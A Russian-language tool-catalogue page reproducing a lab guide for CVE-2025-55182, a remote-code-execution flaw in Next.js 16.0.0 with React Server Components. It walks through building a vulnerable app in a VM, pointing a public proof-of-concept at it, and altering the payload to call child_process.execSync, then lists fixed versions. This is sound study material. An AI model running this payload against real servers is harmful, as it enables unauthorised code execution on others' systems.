Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-55182-poc-test — Воспроизводимая лабораторная работа, демонстрирующая CVE-2025-55182 удаленное выполнение кода против Next.js 16.0.0 с React Server Components, включая выполнение внешнего эксплойта и проверку побочных эффектов. | Kitploit
Инструменты/GitHubGitHub/jandelima/cve-2025-55182-poc-test
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

Воспроизводимая лабораторная работа, демонстрирующая CVE-2025-55182 удаленное выполнение кода против Next.js 16.0.0 с React Server Components, включая выполнение внешнего эксплойта и проверку побочных эффектов.

Репозиторий
38 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 Демонстрационный стенд (Next.js / React RSC RCE)

Этот документ предоставляет полную и воспроизводимую настройку для демонстрации удаленного выполнения кода (RCE) CVE-2025-55182 против уязвимой среды Next.js + React Server Components, работающей внутри виртуальной машины Multipass Ubuntu.

Эксплойт выполняется извне ВМ, что доказывает удаленную эксплуатацию и подготавливает среду для обнаружения аномального поведения.

Source: https://github.com/ejpir/CVE-2025-55182-research


1. Создание и подготовка виртуальной машины Ubuntu

2. Базовая настройка внутри ВМ

2.1 Обновление системы и установка зависимостей

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 Установка Node.js LTS (20.x)

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

Проверка:

root@kitploit:~
node -v
npm -v

2.3 Создание отдельного пользователя для приложения

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. Развертывание уязвимого приложения Next.js

3.1 Создание рабочей директории

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 Генерация минимального проекта Next.js App Router

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 Фиксация уязвимых версий в package.json

Отредактируйте зависимости:

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

Переустановите пакеты:

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

Проверка:

root@kitploit:~
npm list react react-dom next

Ожидаемый результат:

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 Сборка и запуск в production-режиме

root@kitploit:~
npm run build
npm start

Ожидаемый вывод:

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

start


4. Подтверждение внешней доступности (машина атакующего → ВМ)

На другой машине:

root@kitploit:~
curl http://10.102.169.126:3000

Вы должны получить стандартную HTML-страницу Next.js.


5. Клонирование и тестирование PoC на машине атакующего

5.1 Клонирование репозитория

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 Настройка PoC на IP-адрес сервера

Найдите:

root@kitploit:~
hostname: 'localhost',

Замените на:

root@kitploit:~
hostname: '10.X.X.X',

5.3 Запуск базового PoC (простой console.log RCE)

При работающем Next:

root@kitploit:~
node test-simple.cjs

Ожидаемый результат в терминале Next.js:

root@kitploit:~
NON-CHUNKED-RCE

Это подтверждает удаленное выполнение кода через React Flight с использованием уязвимых версий.

confirmed


6. Модификация PoC для выполнения видимого побочного эффекта (создание файла)

Цель — создать наблюдаемое поведение (файловая система + выполнение процесса).

6.1 Редактирование _prefix внутри test-simple.cjs

Найдите:

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

Замените на:

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

Примечание: require недоступен в контексте выполнения, но process.mainModule.require() доступен.

6.2 Тестирование модифицированного эксплойта

Убедитесь, что Next запущен, затем:

root@kitploit:~
node test-simple.cjs

Проверьте создание файла:

root@kitploit:~
ls -l /tmp/

Вы должны увидеть:

root@kitploit:~
cve-2025-55182-syscall

Это подтверждает функциональное RCE с побочными эффектами.

start


Исправление:
React ≥ 19.2.1
Next.js ≥ 16.0.7

Скачать инструмент